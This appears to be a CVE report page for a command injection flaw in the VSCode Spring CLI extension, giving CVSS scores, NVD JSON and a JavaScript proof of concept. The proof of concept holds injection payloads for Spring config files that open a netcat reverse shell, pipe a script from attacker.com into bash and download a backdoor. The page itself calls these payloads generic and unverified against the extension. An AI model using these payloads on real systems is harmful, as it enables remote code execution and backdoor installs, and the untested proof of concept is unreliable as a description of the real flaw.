Security Vulnerability Report
CVE-2026-22718 CVSS 6.8 MEDIUM

CVE-2026-22718

Published: 2026-01-14 05:16:35
Last Modified: 2026-04-15 00:35:42

Description

The VSCode extension for Spring CLI is vulnerable to command injection (CWE-78, OS command injection, per the NVD weakness entry), resulting in command execution on the user's machine. The CVSS vector (AV:L, PR:L, UI:R) means the attacker needs a local, low-privileged foothold and the user must take an action, typically opening or acting on attacker-supplied content in the extension, before the injected command runs.

CVSS Details

CVSS Score
6.8
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L

Configurations (Affected Products)

No configuration data available in the NVD record (the raw JSON below carries no configurations block). The version notes that follow are this page's own, unverified annotations; confirm the fixed version against the Spring advisory at https://spring.io/security/cve-2026-22718 before acting on them.

VSCode Spring CLI extension < fixed version (fixed version not specified on this page)
Spring CLI < 3.0.x (unverified)
All VSCode Spring CLI extension versions that support local command execution (unverified)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-22718 PoC - VSCode Spring CLI Extension Command Injection
// This PoC only generates candidate payload strings for the VSCode Spring CLI extension;
// it does not open VSCode or invoke the extension itself.
// Note: neither the NVD record nor the referenced Spring advisory describes the injection
// vector, so the config-file payloads below are generic CWE-78 shell-metacharacter strings
// and have not been verified against the extension.

// Malicious payload that can be injected into Spring project configuration files.
// `${IFS}` is written as `\${IFS}` so it reaches the output literally instead of being
// interpolated as an (undefined) JavaScript variable; to a POSIX shell, $IFS expands to
// whitespace and is the usual stand-in for a space in filtered input.
const maliciousPayload = {
  // Inject into application.properties
  'application.properties': `
spring.config.location=;echo\${IFS}compromised\${IFS}>/tmp/pwned
spring.datasource.url=jdbc:postgresql://;nc\${IFS}-e\${IFS}/bin/bash\${IFS}attacker.com\${IFS}4444
`,

  // Inject into pom.xml as malicious plugin configuration
  'pom.xml': `
<plugin>
  <groupId>org.springframework.boot</groupId>
  <artifactId>spring-boot-maven-plugin</artifactId>
  <configuration>
    <executable>true</executable>
    <arguments>--server.port=$(curl\${IFS}http://attacker.com/shell.sh|bash)</arguments>
  </configuration>
</plugin>
`,

  // Inject via environment variable manipulation
  'envInjection': `
SPRING_CONFIG_ADDITIONAL_LOCATION=;wget\${IFS}http://attacker.com/backdoor\${IFS}-O\${IFS}/tmp/backdoor
`,
};

// Attack scenario (as claimed by this PoC; not confirmed by the advisory):
// 1. Attacker creates a malicious Spring project or modifies existing project files
// 2. Victim opens the project in VSCode with the vulnerable Spring CLI extension
// 3. Extension parses the malicious configuration
// 4. Commands are injected and executed via the system shell
console.log('CVE-2026-22718 Command Injection Payload Generated');
console.log(JSON.stringify(maliciousPayload, null, 2));

References

https://spring.io/security/cve-2026-22718 (Spring security advisory; the only reference listed in the NVD record)

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-22718", "sourceIdentifier": "[email protected]", "published": "2026-01-14T05:16:34.570", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "The VSCode extension for Spring CLI are vulnerable to command injection, resulting in command execution on the users machine."}, {"lang": "es", "value": "La extensión de VSCode para Spring CLI es vulnerable a inyección de comandos, resultando en la ejecución de comandos en la máquina del usuario."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:H/A:L", "baseScore": 6.8, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "LOW"}, "exploitabilityScore": 1.3, "impactScore": 5.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "references": [{"url": "https://spring.io/security/cve-2026-22718", "source": "[email protected]"}]}}